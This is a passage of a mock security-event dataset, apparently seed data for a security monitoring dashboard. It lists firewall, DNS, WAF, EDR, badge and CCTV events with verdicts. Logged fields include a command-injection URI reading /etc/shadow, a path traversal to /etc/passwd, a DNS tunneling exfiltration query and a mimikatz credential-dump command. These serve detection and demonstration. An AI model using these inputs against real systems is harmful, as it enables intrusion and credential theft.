    id: 'EVT-0036',
    connector: 'BadgeReader',
    sourceIP: '10.0.10.26',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:24.123Z',
    currentPhase: 10,
    severity: 'critical',
    eventType: 'Badge Cloning',
    rawData: '{"reader_id":"DOOR-LAB-02","badge_id":"EMP-7842","employee":"John.Mitchell","access":"GRANTED","reason":"valid_clearance","zone":"R_AND_D","anomaly":"badge_used_at_two_locations_simultaneously"}',
    protocol: 'TCP',
    port: 8080,
    bytes: 384,
    isStructured: true,
    domain: 'physical',
    finalVerdict: 'critical_threat',
    resolutionReason: 'Badge EMP-7842 (John.Mitchell) used simultaneously at DOOR-LAB-02 R_AND_D zone and DOOR-SR-01 (EVT-0008); physical impossibility confirms badge cloning; vector scoring elevated to critical; badge immediately revoked and security dispatch initiated',
  },
  {
    id: 'EVT-0037',
    connector: 'Firewall',
    sourceIP: '10.0.3.22',
    destIP: '10.0.5.107',
    timestamp: '2024-12-15T14:33:25.456Z',
    currentPhase: 5,
    severity: 'medium',
    eventType: 'Lateral Movement',
    rawData: '{"action":"ALLOW","rule":"INTERNAL_SMB","src":"10.0.3.22","dst":"10.0.5.107","app":"smb","bytes_sent":245000,"bytes_recv":12000}',
    protocol: 'SMB',
    port: 445,
    bytes: 257000,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Internal SMB traffic from 10.0.3.22 to known-compromised host 10.0.5.107 allowed by INTERNAL_SMB rule; 245KB sent with only 12KB received indicates asymmetric transfer; awaiting triage to score against lateral movement kill chain',
  },
  {
    id: 'EVT-0038',
    connector: 'DNS',
    sourceIP: '10.0.4.101',
    destIP: '10.0.0.2',
    timestamp: '2024-12-15T14:33:26.789Z',
    currentPhase: 6,
    severity: 'high',
    eventType: 'DNS Tunneling',
    rawData: '{"query":"bXkgc2VjcmV0IGRhdGE.exfil-tunnel.net","type":"TXT","response":"SERVFAIL","client":"10.0.4.101","flags":"QR,RD","entropy":5.14}',
    protocol: 'DNS',
    port: 53,
    bytes: 256,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'DNS TXT query to exfil-tunnel.net from 10.0.4.101 with base64-encoded subdomain (decoded: "my secret data"); entropy 5.14 confirms DNS tunneling; host also flagged for credential dump in EVT-0017; active exfiltration channel confirmed',
  },
  {
    id: 'EVT-0039',
    connector: 'DHCP',
    sourceIP: '10.0.8.99',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:27.012Z',
    currentPhase: 2,
    severity: 'info',
    eventType: 'New Device',
    rawData: '{"msg_type":"DHCPDISCOVER","client_mac":"de:ad:be:ef:ca:fe","assigned_ip":"10.0.8.99","hostname":"IoT-Sensor-47","lease":1800}',
    protocol: 'UDP',
    port: 67,
    bytes: 296,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'DHCP DISCOVER from MAC de:ad:be:ef:ca:fe with hostname IoT-Sensor-47; MAC OUI prefix maps to unrecognized IoT manufacturer; device not in asset inventory; awaiting parse completion for device fingerprinting',
  },
  {
    id: 'EVT-0040',
    connector: 'WAF',
    sourceIP: '185.143.172.21',
    destIP: '10.0.2.10',
    timestamp: '2024-12-15T14:33:28.345Z',
    currentPhase: 11,
    severity: 'critical',
    eventType: 'RCE Attempt',
    rawData: '{"rule_id":"932100","attack":"Remote Code Execution","uri":"/api/v1/exec?cmd=;cat /etc/shadow","client":"185.143.172.21","action":"BLOCKED","score":99}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 1024,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'critical_threat',
    resolutionReason: 'WAF rule 932100 blocked RCE attempt to /api/v1/exec with shell command injection (cat /etc/shadow) from 185.143.172.21; attack score 99/100; source IP in APT-linked infrastructure; ALHF confirmed and escalated to IR team',
  },
  {
    id: 'EVT-0041',
    connector: 'DPI',
    sourceIP: '10.0.6.33',
    destIP: '151.101.1.140',
    timestamp: '2024-12-15T14:33:29.678Z',
    currentPhase: 1,
    severity: 'info',
    eventType: 'Web Browsing',
    rawData: '{"proto":"TCP","src":"10.0.6.33","dst":"151.101.1.140","payload_hash":"f1a2b3c4d5e6","flags":"PSH,ACK","ja3":"769faa961ec1"}',
    protocol: 'TCP',
    port: 443,
    bytes: 8912,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Standard web browsing from 10.0.6.33 to Reddit CDN 151.101.1.140; JA3 769faa961ec1 matches Firefox browser profile; normal content consumption traffic during business hours; no IOC match on destination',
  },
  {
    id: 'EVT-0042',
    connector: 'NetFlow',
    sourceIP: '10.0.5.107',
    destIP: '45.77.65.211',
    timestamp: '2024-12-15T14:33:30.901Z',
    currentPhase: 8,
    severity: 'high',
    eventType: 'Data Exfil',
    rawData: '{"src_addr":"10.0.5.107","dst_addr":"45.77.65.211","bytes":1048576,"packets":8721,"flow_duration":120.3}',
    protocol: 'TCP',
    port: 443,
    bytes: 1048576,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'NetFlow shows 1MB exfiltration from compromised host 10.0.5.107 to 45.77.65.211 (Vultr VPS) over 120.3s; 8721 packets indicate sustained bulk transfer; destination in low-reputation ASN; automated containment blocking outbound traffic from source',
  },
  {
    id: 'EVT-0043',
    connector: 'Syslog',
    sourceIP: '10.0.0.5',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:31.234Z',
    currentPhase: 3,
    severity: 'low',
    eventType: 'Auth Failure',
    rawData: '<86>Dec 15 14:33:31 ldap-srv-01 slapd[3847]: conn=1024 op=0 BIND dn="cn=admin,dc=corp" method=128 result=49 text=Invalid credentials',
    protocol: 'TCP',
    port: 389,
    bytes: 156,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'LDAP bind failure on ldap-srv-01 for cn=admin with invalid credentials; single auth failure from internal host 10.0.0.5; awaiting enrichment with historical failure count and source user context to distinguish typo from attack',
  },
  {
    id: 'EVT-0044',
    connector: 'Syslog',
    sourceIP: '10.0.7.15',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:32.567Z',
    currentPhase: 6,
    severity: 'medium',
    eventType: 'Config Change',
    rawData: '<134>Dec 15 14:33:32 core-rtr-01 config[9921]: User=netadmin CLI: configure terminal; interface GigabitEthernet0/1; no shutdown',
    protocol: 'UDP',
    port: 514,
    bytes: 192,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Router config change by netadmin on core-rtr-01 enabling GigabitEthernet0/1; change occurred outside scheduled maintenance window; deep enrichment analyzing change management ticket correlation and netadmin session legitimacy',
  },
  {
    id: 'EVT-0045',
    connector: 'BytecodeWeaver',
    sourceIP: '10.0.4.150',
    destIP: '10.0.4.150',
    timestamp: '2024-12-15T14:33:33.890Z',
    currentPhase: 3,
    severity: 'info',
    eventType: 'Process Start',
    rawData: '{"agent":"BWv3.2","pid":11204,"process":"notepad.exe","injection_type":"none","target_pid":0,"confidence":0.02}',
    protocol: 'TCP',
    port: 0,
    bytes: 1024,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'BytecodeWeaver agent reported notepad.exe (PID 11204) start with zero injection indicators and 0.02 confidence; standard user-space application launch; no suspicious parent process chain or command line arguments',
  },
  {
    id: 'EVT-0046',
    connector: 'CloudTrail',
    sourceIP: '10.0.1.10',
    destIP: '10.0.0.5',
    timestamp: '2024-12-15T14:33:34.123Z',
    currentPhase: 5,
    severity: 'info',
    eventType: 'S3 Access',
    rawData: '{"eventName":"GetObject","userIdentity":{"arn":"arn:aws:iam::123456789:role/data-pipeline"},"sourceIP":"10.0.1.10","bucket":"production-data","key":"reports/2024-q4.csv"}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 4096,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'CloudTrail GetObject on production-data/reports/2024-q4.csv by data-pipeline role from internal IP 10.0.1.10; IAM role is authorized for S3 read; access pattern matches scheduled ETL pipeline execution window',
  },
  {
    id: 'EVT-0047',
    connector: 'EDR',
    sourceIP: '10.0.4.90',
    destIP: '10.0.4.90',
    timestamp: '2024-12-15T14:33:35.456Z',
    currentPhase: 7,
    severity: 'high',
    eventType: 'Credential Dump',
    rawData: '{"host":"SRV-AD-01","process":"mimikatz.exe","commandLine":"sekurlsa::logonpasswords","detection":"CREDENTIAL_ACCESS"}',
    protocol: 'TCP',
    port: 445,
    bytes: 2048,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'Mimikatz.exe executed sekurlsa::logonpasswords on domain controller SRV-AD-01; CREDENTIAL_ACCESS detection confirmed; this is a Tier-1 credential harvesting tool targeting LSASS memory; investigation collecting affected account scope',
  },
  {
    id: 'EVT-0048',
    connector: 'CCTV',
    sourceIP: '10.0.10.15',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:36.789Z',
    currentPhase: 2,
    severity: 'info',
    eventType: 'Routine Check',
    rawData: 'HEALTH_CHECK zone=LOBBY camera=CAM-LOBBY-01 status=ONLINE resolution=4K fps=30 storage_pct=67 timestamp=2024-12-15T14:33:36Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 384,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'benign',
    resolutionReason: 'CCTV health check from CAM-LOBBY-01 in LOBBY zone; camera ONLINE at 4K/30fps with 67% storage utilization; routine telemetry heartbeat with no security-relevant content',
  },
  {
    id: 'EVT-0049',
    connector: 'CCTV',
    sourceIP: '10.0.10.16',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:37.012Z',
    currentPhase: 9,
    severity: 'high',
    eventType: 'Perimeter Breach',
    rawData: 'PERIMETER_ALERT zone=FENCE_NORTH camera=CAM-EXT-03 confidence=0.96 object=PERSON breach_type=CLIMB timestamp=2024-12-15T14:33:37Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 544,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'threat',
    resolutionReason: 'CAM-EXT-03 detected person climbing FENCE_NORTH perimeter at 0.96 confidence; breach type CLIMB confirmed by multi-frame analysis; no corresponding badge entry within 300m radius; security dispatch and law enforcement notification triggered',
  },
  {
    id: 'EVT-0050',
    connector: 'BadgeReader',
    sourceIP: '10.0.10.28',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:38.345Z',
    currentPhase: 4,
    severity: 'low',
    eventType: 'Badge Scan',
    rawData: '{"reader_id":"DOOR-FL2-05","badge_id":"EMP-5510","employee":"Mike.Rodriguez","access":"GRANTED","reason":"valid_clearance","zone":"ENGINEERING"}',
    protocol: 'TCP',
    port: 8080,
    bytes: 304,
    isStructured: true,
    domain: 'physical',
    finalVerdict: 'benign',
    resolutionReason: 'Routine badge scan for EMP-5510 (Mike.Rodriguez) at DOOR-FL2-05 ENGINEERING zone; valid clearance; access during standard work hours; employee assigned to engineering floor per HR directory',
  },
  {
    id: 'EVT-0051',
    connector: 'Firewall',
    sourceIP: '91.240.118.44',
    destIP: '10.0.2.10',
    timestamp: '2024-12-15T14:33:39.678Z',
    currentPhase: 4,
    severity: 'medium',
    eventType: 'Port Scan',
    rawData: '{"action":"BLOCK","rule":"PORT_SCAN_DETECT","src":"91.240.118.44","dst":"10.0.2.10","app":"unknown","ports_scanned":1247}',
    protocol: 'TCP',
    port: 0,
    bytes: 48,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Firewall blocked 1247 port scan probes from 91.240.118.44 targeting 10.0.2.10; source IP in known scanning infrastructure ASN; awaiting correlation with threat intel feed to classify as reconnaissance or automated vulnerability scan',
  },
  {
    id: 'EVT-0052',
    connector: 'DNS',
    sourceIP: '10.0.6.55',
    destIP: '10.0.0.2',
    timestamp: '2024-12-15T14:33:40.901Z',
    currentPhase: 1,
    severity: 'info',
    eventType: 'DNS Query',
    rawData: '{"query":"slack.com","type":"A","response":"34.120.16.1","client":"10.0.6.55","flags":"QR,RD,RA","entropy":1.89}',
    protocol: 'DNS',
    port: 53,
    bytes: 64,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'DNS A-record query for slack.com from 10.0.6.55 resolved to known Slack IP 34.120.16.1; entropy 1.89 indicates standard domain; approved SaaS application in corporate whitelist',
  },
  {
    id: 'EVT-0053',
    connector: 'DHCP',
    sourceIP: '10.0.9.45',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:41.234Z',
    currentPhase: 6,
    severity: 'medium',
    eventType: 'DHCP Starvation',
    rawData: '{"msg_type":"DHCPDISCOVER","client_mac":"ff:ff:ff:ff:ff:01","assigned_ip":"","hostname":"","lease":0,"error":"POOL_EXHAUSTED","requests_per_sec":450}',
    protocol: 'UDP',
    port: 67,
    bytes: 312,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'DHCP pool exhaustion detected with 450 DISCOVER requests/sec from spoofed MAC ff:ff:ff:ff:ff:01; broadcast storm pattern consistent with DHCP starvation attack (MITRE T1557); deep enrichment correlating with rogue device detection',
  },
  {
    id: 'EVT-0054',
    connector: 'WAF',
    sourceIP: '172.16.0.88',
    destIP: '10.0.2.10',
    timestamp: '2024-12-15T14:33:42.567Z',
    currentPhase: 5,
    severity: 'low',
    eventType: 'Path Traversal',
    rawData: '{"rule_id":"930100","attack":"Path Traversal","uri":"/static/../../etc/passwd","client":"172.16.0.88","action":"BLOCKED","score":62}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 768,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'WAF rule 930100 blocked path traversal attempt (../../etc/passwd) from internal IP 172.16.0.88; attack score 62/100; source is internal subnet which may indicate compromised host or penetration test; awaiting triage for context',
  },
  {
    id: 'EVT-0055',
    connector: 'DPI',
    sourceIP: '10.0.3.22',
    destIP: '10.0.5.107',
    timestamp: '2024-12-15T14:33:43.890Z',
    currentPhase: 6,
    severity: 'medium',
    eventType: 'Lateral Movement',
    rawData: '{"proto":"SMB","src":"10.0.3.22","dst":"10.0.5.107","payload_hash":"d4e5f6a7b8c9","flags":"PSH,ACK","smb_command":"TREE_CONNECT"}',
    protocol: 'SMB',
    port: 445,
    bytes: 34560,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'DPI captured SMB TREE_CONNECT from 10.0.3.22 to compromised host 10.0.5.107; lateral movement pattern via SMB admin share mapping; source host appeared in EVT-0014 and EVT-0037; deep enrichment building attack graph',
  },
  {
    id: 'EVT-0056',
    connector: 'NetFlow',
    sourceIP: '10.0.2.10',
    destIP: '10.0.1.5',
    timestamp: '2024-12-15T14:33:44.123Z',
    currentPhase: 1,
    severity: 'info',
    eventType: 'Internal Traffic',
    rawData: '{"src_addr":"10.0.2.10","dst_addr":"10.0.1.5","bytes":2048,"packets":14,"flow_duration":0.8}',
    protocol: 'TCP',
    port: 3306,
    bytes: 2048,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Routine internal NetFlow between web server 10.0.2.10 and database 10.0.1.5 on MySQL port 3306; 2KB over 0.8s matches standard query/response pattern; both hosts in approved application topology',
  },
  {
    id: 'EVT-0057',
    connector: 'Syslog',
    sourceIP: '10.0.4.42',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:45.456Z',
    currentPhase: 8,
    severity: 'high',
    eventType: 'Privilege Escalation',
    rawData: '<86>Dec 15 14:33:45 wks-fin-042 sudo: pam_unix(sudo:auth): authentication failure; logname=jdoe uid=1001 euid=0 tty=/dev/pts/2 ruser=jdoe rhost= user=root',
    protocol: 'TCP',
    port: 22,
    bytes: 210,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'Sudo authentication failure on wks-fin-042 (same host as EVT-0006 malware); user jdoe attempted root escalation via sudo; host already under investigation for AMSI bypass; privilege escalation attempt may indicate attacker pivoting to root access',
  },
  {
    id: 'EVT-0058',
    connector: 'CCTV',
    sourceIP: '10.0.10.10',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:46.789Z',
    currentPhase: 3,
    severity: 'low',
    eventType: 'Camera Tamper',
    rawData: 'TAMPER_DETECT zone=WAREHOUSE_C camera=CAM-WH-04 type=OBSTRUCTION confidence=0.78 duration_sec=15 timestamp=2024-12-15T14:33:46Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 464,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'pending',
    resolutionReason: 'CCTV CAM-WH-04 detected camera obstruction in WAREHOUSE_C at 0.78 confidence for 15 seconds; tamper type OBSTRUCTION may indicate intentional camera blinding; awaiting enrichment with nearby badge reader and motion sensor correlation',
  },
  {
    id: 'EVT-0059',
    connector: 'BadgeReader',
    sourceIP: '10.0.10.30',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:47.012Z',
    currentPhase: 11,
    severity: 'critical',
    eventType: 'Unauthorized Access',
    rawData: '{"reader_id":"DOOR-EXEC-01","badge_id":"EMP-0000","employee":"UNKNOWN","access":"FORCED_ENTRY","reason":"door_held_open","zone":"EXECUTIVE_SUITE","alarm":true}',
    protocol: 'TCP',
    port: 8080,
    bytes: 400,
    isStructured: true,
    domain: 'physical',
    finalVerdict: 'critical_threat',
    resolutionReason: 'Forced entry at DOOR-EXEC-01 EXECUTIVE_SUITE with unknown badge EMP-0000; door held open alarm triggered; no employee match in directory; ALHF confirmed critical physical breach; security team dispatched and executive floor locked down',
  },
  {
    id: 'EVT-0060',
    connector: 'Syslog',
    sourceIP: '10.0.0.3',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:48.345Z',
    currentPhase: 2,
    severity: 'info',
    eventType: 'VPN Connection',
    rawData: '<134>Dec 15 14:33:48 vpn-gw-01 openvpn[4521]: user=remote.worker TLS handshake completed src=73.162.45.88:51234 cipher=AES-256-GCM',
    protocol: 'UDP',
    port: 1194,
    bytes: 176,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'OpenVPN TLS handshake completed for user remote.worker from residential IP 73.162.45.88; AES-256-GCM cipher negotiated; user in approved remote access group; source IP matches employee registered ISP geo-region',
  },
];
